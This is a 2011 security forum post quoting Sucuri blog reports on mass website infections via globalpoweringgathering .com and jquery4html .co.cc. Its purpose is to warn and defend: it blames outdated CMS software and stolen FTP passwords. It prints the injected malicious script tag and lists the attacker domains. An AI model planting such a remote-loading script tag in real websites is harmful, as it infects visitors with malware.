Jump to content


Mass infections globalpoweringgathering .com

  • Please log in to reply
No replies to this topic

#1 AplusWebMaster



  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 25 April 2011 - 09:32 PM


Mass infections – globalpoweringgathering .com
- http://blog.sucuri.n...hering-com.html
April 25, 2011 - "We first detected malware from globalpoweringgathering .com almost a month ago, and posted on our blog* about it. But just on the last few days, we started to see a big increase in the number of sites infected with it. We were able to catalog a find almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page** (and it is growing each day – just yesterday it was less than 1 thousand)... On our original post, we explained about this malware, which was injecting an encoded javascript directly in the WordPress database. However, on the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):
< script src="http ://globalpoweringgathering .com/in.php?n=15"..
With some variations, with just a number changing:
http ://globalpoweringgathering .com/in.php?n=15
http ://globalpoweringgathering .com/in.php?n=25
http ://globalpoweringgathering .com/in.php?n=2
http ://globalpoweringgathering .com/in.php?n=9
Note that this is a very similar from the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):
globalpoweringgathering .com
lessthenaminutehandle .com
lessthenaseconddeal .com
welcometotheglobalisnet .com ...
We are seeing multiple causes. The most common was related the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that got compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc)..."
* http://blog.sucuri.n...re-updates.html

** http://safebrowsing....ggathering.com/
"... Malicious software includes 37 scripting exploit(s)... It infected 1919 domain(s)..."

- http://blog.sucuri.n...directions.html
April 26, 2011 - "Today we started to see a lot of sites infected with an iframe malware from jquery4html .co.cc (yes, always the .co.cc)... when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:
The domain jquery4html.co.cc is available Continue to registration >>
If you want to build a site at this address, please visit us at www .co.cc
We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore... Too bad.
A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection .com, hilitsors .cz.cc and many other intermediaries... There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com..."
(More detail at the blog.sucuri.net URL above.)

:grrr: :ph34r:

Edited by AplusWebMaster, 27 April 2011 - 07:01 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...

Member of UNITE
Support SpywareInfo Forum - click the button